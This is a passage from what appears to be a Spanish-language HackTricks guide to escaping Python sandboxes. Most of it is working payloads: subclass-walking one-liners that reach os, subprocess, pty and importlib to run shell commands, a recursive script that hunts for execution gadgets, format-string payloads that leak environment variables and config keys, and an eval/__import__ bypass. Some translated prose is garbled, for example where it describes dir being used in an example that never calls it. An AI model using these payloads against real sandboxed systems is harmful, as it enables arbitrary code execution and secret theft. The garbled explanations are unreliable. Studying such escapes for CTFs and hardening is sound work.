Por ejemplo, sabiendo que con la biblioteca sys es posible importar bibliotecas arbitrarias, puedes buscar todos los módulos cargados que hayan importado sys dentro de ellos:

[ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ]
['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations']

Hay muchos, y solo necesitamos uno para ejecutar comandos:

[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")

Podemos hacer lo mismo con otras bibliotecas que sabemos que se pueden usar para ejecutar comandos:

#os
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')

#subprocess
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls")
[ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls')
[ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls')

#builtins
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ]
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls")

#sys
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls")

#commands (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls")

#pty (not very common)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls")

#importlib
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls")
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls")

#pdb
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls")

Además, incluso podríamos buscar qué módulos están cargando bibliotecas maliciosas:

bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
for b in bad_libraries_names:
vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ]
print(f"{b}: {', '.join(vuln_libs)}")

"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
commands:
subprocess: BaseDependency, Origin, Version, Package
pty:
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
imp:
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
pdb:
"""

Además, si crees que otras bibliotecas pueden ser capaces de invocar funciones para ejecutar comandos, también podemos filtrar por nombres de funciones dentro de las posibles bibliotecas:

bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"]
bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"]
for b in bad_libraries_names + bad_func_names:
vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ]
print(f"{b}: {', '.join(vuln_funcs)}")

"""
os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations
commands:
subprocess: BaseDependency, Origin, Version, Package
pty:
importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path
imp:
sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature
pip:
pdb:
system: _wrap_close, _wrap_close
getstatusoutput: CompletedProcess, Popen
getoutput: CompletedProcess, Popen
call: CompletedProcess, Popen
Popen: CompletedProcess, Popen
spawn:
import_module:
__import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec
load_source: NullImporter, _HackedGetData
execfile:
execute:
__builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, MimeTypes, RequestField, RequestMethods, DeflateDecoder, GzipDecoder, MultiDecoder, ConnectionPool, CharSetProber, CodingStateMachine, CharDistributionAnalysis, JapaneseContextAnalysis, UniversalDetector, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, DSAParameterNumbers, DSAPublicNumbers, DSAPrivateNumbers, ObjectIdentifier, ECDSA, EllipticCurvePublicNumbers, EllipticCurvePrivateNumbers, RSAPrivateNumbers, RSAPublicNumbers, DERReader, BestAvailableEncryption, CBC, XTS, OFB, CFB, CFB8, CTR, GCM, Cipher, _CipherContext, _AEADCipherContext, AES, Camellia, TripleDES, Blowfish, CAST5, ARC4, IDEA, SEED, ChaCha20, _FragList, _SSHFormatECDSA, Hash, SHAKE128, SHAKE256, BLAKE2b, BLAKE2s, NameAttribute, RelativeDistinguishedName, Name, RFC822Name, DNSName, UniformResourceIdentifier, DirectoryName, RegisteredID, IPAddress, OtherName, Extensions, CRLNumber, AuthorityKeyIdentifier, SubjectKeyIdentifier, AuthorityInformationAccess, SubjectInformationAccess, AccessDescription, BasicConstraints, DeltaCRLIndicator, CRLDistributionPoints, FreshestCRL, DistributionPoint, PolicyConstraints, CertificatePolicies, PolicyInformation, UserNotice, NoticeReference, ExtendedKeyUsage, TLSFeature, InhibitAnyPolicy, KeyUsage, NameConstraints, Extension, GeneralNames, SubjectAlternativeName, IssuerAlternativeName, CertificateIssuer, CRLReason, InvalidityDate, PrecertificateSignedCertificateTimestamps, SignedCertificateTimestamps, OCSPNonce, IssuingDistributionPoint, UnrecognizedExtension, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _OpenSSLError, Binding, _X509NameInvalidator, PKey, _EllipticCurve, X509Name, X509Extension, X509Req, X509, X509Store, X509StoreContext, Revoked, CRL, PKCS12, NetscapeSPKI, _PassphraseHelper, _CallbackExceptionHelper, Context, Connection, _CipherContext, _CMACContext, _X509ExtensionParser, DHPrivateNumbers, DHPublicNumbers, DHParameterNumbers, _DHParameters, _DHPrivateKey, _DHPublicKey, Prehashed, _DSAVerificationContext, _DSASignatureContext, _DSAParameters, _DSAPrivateKey, _DSAPublicKey, _ECDSASignatureContext, _ECDSAVerificationContext, _EllipticCurvePrivateKey, _EllipticCurvePublicKey, _Ed25519PublicKey, _Ed25519PrivateKey, _Ed448PublicKey, _Ed448PrivateKey, _HashContext, _HMACContext, _Certificate, _RevokedCertificate, _CertificateRevocationList, _CertificateSigningRequest, _SignedCertificateTimestamp, OCSPRequestBuilder, _SingleResponse, OCSPResponseBuilder, _OCSPResponse, _OCSPRequest, _Poly1305Context, PSS, OAEP, MGF1, _RSASignatureContext, _RSAVerificationContext, _RSAPrivateKey, _RSAPublicKey, _X25519PublicKey, _X25519PrivateKey, _X448PublicKey, _X448PrivateKey, Scrypt, PKCS7SignatureBuilder, Backend, GetCipherByName, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, RawJSON, JSONDecoder, JSONEncoder, Cookie, CookieJar, MockRequest, MockResponse, Response, BaseAdapter, UnixHTTPConnection, monkeypatch, JSONDecoder, JSONEncoder, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close
"""

Búsqueda recursiva de Builtins, Globals...

{% hint style="warning" %} Esto es simplemente increíble. Si estás buscando un objeto como globals, builtins, open o cualquier otro, simplemente usa este script para encontrar de forma recursiva los lugares donde puedes encontrar ese objeto. {% endhint %}

import os, sys # Import these to find more gadgets

SEARCH_FOR = {
# Misc
"__globals__": set(),
"builtins": set(),
"__builtins__": set(),
"open": set(),

# RCE libs
"os": set(),
"subprocess": set(),
"commands": set(),
"pty": set(),
"importlib": set(),
"imp": set(),
"sys": set(),
"pip": set(),
"pdb": set(),

# RCE methods
"system": set(),
"popen": set(),
"getstatusoutput": set(),
"getoutput": set(),
"call": set(),
"Popen": set(),
"popen": set(),
"spawn": set(),
"import_module": set(),
"__import__": set(),
"load_source": set(),
"execfile": set(),
"execute": set()
}

#More than 4 is very time consuming
MAX_CONT = 4

#The ALREADY_CHECKED makes the script run much faster, but some solutions won't be found
#ALREADY_CHECKED = set()

def check_recursive(element, cont, name, orig_n, orig_i, execute):
# If bigger than maximum, stop
if cont > MAX_CONT:
return

# If already checked, stop
#if name and name in ALREADY_CHECKED:
#    return

# Add to already checked
#if name:
#    ALREADY_CHECKED.add(name)

# If found add to the dict
for k in SEARCH_FOR:
if k in dir(element) or (type(element) is dict and k in element):
SEARCH_FOR[k].add(f"{orig_i}: {orig_n}.{name}")

# Continue with the recursivity
for new_element in dir(element):
try:
check_recursive(getattr(element, new_element), cont+1, f"{name}.{new_element}", orig_n, orig_i, execute)

# WARNING: Calling random functions sometimes kills the script
# Comment this part if you notice that behaviour!!
if execute:
try:
if callable(getattr(element, new_element)):
check_recursive(getattr(element, new_element)(), cont+1, f"{name}.{new_element}()", orig_i, execute)
except:
pass

except:
pass

# If in a dict, scan also each key, very important
if type(element) is dict:
for new_element in element:
check_recursive(element[new_element], cont+1, f"{name}[{new_element}]", orig_n, orig_i)


def main():
print("Checking from empty string...")
total = [""]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Empty str {i}", True)

print()
print("Checking loaded subclasses...")
total = "".__class__.__base__.__subclasses__()
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Subclass {i}", True)

print()
print("Checking from global functions...")
total = [print, check_recursive]
for i,element in enumerate(total):
print(f"\rStatus: {i}/{len(total)}", end="")
cont = 1
check_recursive(element, cont, "", str(element), f"Global func {i}", False)

print()
print(SEARCH_FOR)


if __name__ == "__main__":
main()

Puedes verificar la salida de este script en esta página:

{% content-ref url="broken-reference" %} Enlace roto {% endcontent-ref %}

Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos proactivos de amenazas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Python Format String

Si envías una cadena a Python que va a ser formateada, puedes usar {} para acceder a la información interna de Python. Puedes usar los ejemplos anteriores para acceder a variables globales o funciones integradas, por ejemplo.

{% hint style="info" %} Sin embargo, hay una limitación, solo puedes usar los símbolos .[], por lo que no podrás ejecutar código arbitrario, solo leer información.
Si sabes cómo ejecutar código a través de esta vulnerabilidad, por favor contáctame. {% endhint %}

# Example from https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/
CONFIG = {
"KEY": "ASXFYFGK78989"
}

class PeopleInfo:
def __init__(self, fname, lname):
self.fname = fname
self.lname = lname

def get_name_for_avatar(avatar_str, people_obj):
return avatar_str.format(people_obj = people_obj)

people = PeopleInfo('GEEKS', 'FORGEEKS')

st = "{people_obj.__init__.__globals__[CONFIG][KEY]}"
get_name_for_avatar(st, people_obj = people)

Ten en cuenta cómo puedes acceder a atributos de forma normal con un punto como people_obj.__init__ y a elementos de un diccionario con paréntesis sin comillas __globals__[CONFIG]

También puedes usar .__dict__ para enumerar elementos de un objeto get_name_for_avatar("{people_obj.__init__.__globals__[os].__dict__}", people_obj = people)

Otras características interesantes de las cadenas de formato es la posibilidad de ejecutar las funciones str, repr y ascii en el objeto indicado agregando !s, !r, !a respectivamente:

st = "{people_obj.__init__.__globals__[CONFIG][KEY]!a}"
get_name_for_avatar(st, people_obj = people)

Además, es posible codificar nuevos formateadores en clases:

class HAL9000(object):
def __format__(self, format):
if (format == 'open-the-pod-bay-doors'):
return "I'm afraid I can't do that."
return 'HAL 9000'

'{:open-the-pod-bay-doors}'.format(HAL9000())
#I'm afraid I can't do that.

Más ejemplos sobre ejemplos de formato string se pueden encontrar en https://pyformat.info/

{% hint style="danger" %} Consulte también la siguiente página para obtener gadgets que leerán información confidencial de los objetos internos de Python: {% endhint %}

{% content-ref url="../python-internal-read-gadgets.md" %} python-internal-read-gadgets.md {% endcontent-ref %}

Cargas útiles de divulgación de información confidencial

{whoami.__class__.__dict__}
{whoami.__globals__[os].__dict__}
{whoami.__globals__[os].environ}
{whoami.__globals__[sys].path}
{whoami.__globals__[sys].modules}

# Access an element through several links
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}

Desglosando Objetos en Python

{% hint style="info" %} Si quieres aprender sobre el bytecode de Python en profundidad, lee este increíble artículo sobre el tema: https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d {% endhint %}

En algunos CTFs se te puede proporcionar el nombre de una función personalizada donde se encuentra la bandera y necesitas ver los detalles internos de la función para extraerla.

Esta es la función a inspeccionar:

def get_flag(some_input):
var1=1
var2="secretcode"
var3=["some","array"]
if some_input == var2:
return "THIS-IS-THE-FALG!"
else:
return "Nope"

dir

La función dir en Python se utiliza para obtener una lista de nombres de atributos y métodos de un objeto. Puede ser útil en el contexto de eludir las cajas de arena de Python.

Cuando se ejecuta en un entorno de caja de arena, dir puede mostrar solo un subconjunto limitado de atributos y métodos del objeto. Esto se debe a que las cajas de arena suelen restringir el acceso a ciertas funcionalidades y recursos del sistema.

Sin embargo, existen técnicas para eludir estas restricciones y obtener una lista completa de atributos y métodos utilizando dir. Una forma común de hacerlo es utilizando la función eval para ejecutar código arbitrario dentro de la caja de arena.

Aquí hay un ejemplo de cómo se puede utilizar dir para eludir una caja de arena de Python:

import builtins

def bypass_sandbox():
    # Ejecutar código arbitrario dentro de la caja de arena
    eval("__import__('os').system('ls')", {'__builtins__': builtins})

bypass_sandbox()

En este ejemplo, dir se utiliza para obtener una lista de atributos y métodos del objeto builtins. Luego, se utiliza la función eval para ejecutar código arbitrario dentro de la caja de arena y realizar una llamada al sistema para listar los archivos en el directorio actual.

Es importante tener en cuenta que eludir las cajas de arena de Python puede ser considerado una actividad maliciosa y puede ser ilegal sin el permiso adecuado. Esta información se proporciona únicamente con fines educativos y de investigación.

dir() #General dir() to find what we have loaded
['__builtins__', '__doc__', '__name__', '__package__', 'b', 'bytecode', 'code', 'codeobj', 'consts', 'dis', 'filename', 'foo', 'get_flag', 'names', 'read', 'x']
dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']

globals

__globals__ y func_globals (Igual) Obtiene el entorno global. En el ejemplo se pueden ver algunos módulos importados, algunas variables globales y su contenido declarado:

get_flag.func_globals
get_flag.__globals__
{'b': 3, 'names': ('open', 'read'), '__builtins__': <module '__builtin__' (built-in)>, 'codeobj': <code object <module> at 0x7f58c00b26b0, file "noname", line 1>, 'get_flag': <function get_flag at 0x7f58c00b27d0>, 'filename': './poc.py', '__package__': None, 'read': <function read at 0x7f58c00b23d0>, 'code': <type 'code'>, 'bytecode': 't\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00S', 'consts': (None, './poc.py', 'r'), 'x': <unbound method catch_warnings.__init__>, '__name__': '__main__', 'foo': <function foo at 0x7f58c020eb50>, '__doc__': None, 'dis': <module 'dis' from '/usr/lib/python2.7/dis.pyc'>}

#If you have access to some variable value
CustomClassObject.__class__.__init__.__globals__

Ver aquí más lugares para obtener los globales

Accediendo al código de la función

__code__ y func_code: Puedes acceder a este atributo de la función para obtener el objeto de código de la función.

# In our current example
get_flag.__code__
<code object get_flag at 0x7f9ca0133270, file "<stdin>", line 1

# Compiling some python code
compile("print(5)", "", "single")
<code object <module> at 0x7f9ca01330c0, file "", line 1>

#Get the attributes of the code object
dir(get_flag.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']

Obtener información del código

When bypassing Python sandboxes, it is crucial to gather as much information about the code as possible. This information can help in understanding the security measures implemented and finding potential vulnerabilities.

Inspecting the Code

The first step is to inspect the code and understand its structure and logic. This can be done by reading the source code or decompiling the bytecode if the code is compiled.

Analyzing Imports

Analyzing the imports used in the code can provide insights into the functionality and dependencies of the code. It can also help identify any external libraries or modules that may be used.

Identifying Security Measures

Identifying the security measures implemented in the code is essential for bypassing the sandbox. This includes checking for the use of restricted built-in functions, restricted modules, or any custom security checks.

Understanding Input Validation

Understanding how the code validates and processes user input is crucial for finding potential vulnerabilities. This includes analyzing input sanitization, validation checks, and any potential input manipulation.

Analyzing Error Handling

Analyzing how the code handles errors can provide valuable information. It can help identify any error messages or stack traces that may leak sensitive information or provide clues for bypassing the sandbox.

Reverse Engineering

If the code is obfuscated or protected, reverse engineering techniques can be used to understand its functionality. This includes techniques like decompiling, disassembling, or debugging the code.

By gathering and analyzing code information, you can gain a better understanding of the code's structure, security measures, and potential vulnerabilities. This knowledge is crucial for successfully bypassing Python sandboxes.

# Another example
s = '''
a = 5
b = 'text'
def f(x):
return x
f(5)
'''
c=compile(s, "", "exec")

# __doc__: Get the description of the function, if any
print.__doc__

# co_consts: Constants
get_flag.__code__.co_consts
(None, 1, 'secretcode', 'some', 'array', 'THIS-IS-THE-FALG!', 'Nope')

c.co_consts #Remember that the exec mode in compile() generates a bytecode that finally returns None.
(5, 'text', <code object f at 0x7f9ca0133540, file "", line 4>, 'f', None

# co_names: Names used by the bytecode which can be global variables, functions, and classes or also attributes loaded from objects.
get_flag.__code__.co_names
()

c.co_names
('a', 'b', 'f')


#co_varnames: Local names used by the bytecode (arguments first, then the local variables)
get_flag.__code__.co_varnames
('some_input', 'var1', 'var2', 'var3')

#co_cellvars: Nonlocal variables These are the local variables of a function accessed by its inner functions.
get_flag.__code__.co_cellvars
()

#co_freevars: Free variables are the local variables of an outer function which are accessed by its inner function.
get_flag.__code__.co_freevars
()

#Get bytecode
get_flag.__code__.co_code
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'

Desensamblar una función

Cuando se intenta eludir las técnicas de sandboxing de Python, a menudo es útil desensamblar una función para comprender su funcionamiento interno. El desensamblaje implica convertir el código de bytes de una función en su representación legible por humanos, lo que permite analizar el flujo de ejecución y identificar posibles vulnerabilidades.

Python proporciona la biblioteca dis que permite desensamblar funciones. A continuación se muestra un ejemplo de cómo desensamblar una función en Python:

import dis

def my_function():
    x = 5
    y = 10
    z = x + y
    print(z)

dis.dis(my_function)

El resultado del desensamblaje mostrará la secuencia de instrucciones en código de bytes y su correspondiente representación en lenguaje ensamblador. Esto puede ayudar a identificar cualquier comportamiento sospechoso o instrucciones que podrían ser modificadas para eludir las técnicas de sandboxing.

Es importante tener en cuenta que el desensamblaje de una función no siempre es necesario o útil, y puede depender del contexto y los objetivos específicos del análisis. Sin embargo, cuando se utiliza correctamente, puede ser una herramienta valiosa para comprender el funcionamiento interno de una función y encontrar posibles vulnerabilidades.

import dis
dis.dis(get_flag)
2           0 LOAD_CONST               1 (1)
3 STORE_FAST               1 (var1)

3           6 LOAD_CONST               2 ('secretcode')
9 STORE_FAST               2 (var2)

4          12 LOAD_CONST               3 ('some')
15 LOAD_CONST               4 ('array')
18 BUILD_LIST               2
21 STORE_FAST               3 (var3)

5          24 LOAD_FAST                0 (some_input)
27 LOAD_FAST                2 (var2)
30 COMPARE_OP               2 (==)
33 POP_JUMP_IF_FALSE       40

6          36 LOAD_CONST               5 ('THIS-IS-THE-FLAG!')
39 RETURN_VALUE

8     >>   40 LOAD_CONST               6 ('Nope')
43 RETURN_VALUE
44 LOAD_CONST               0 (None)
47 RETURN_VALUE

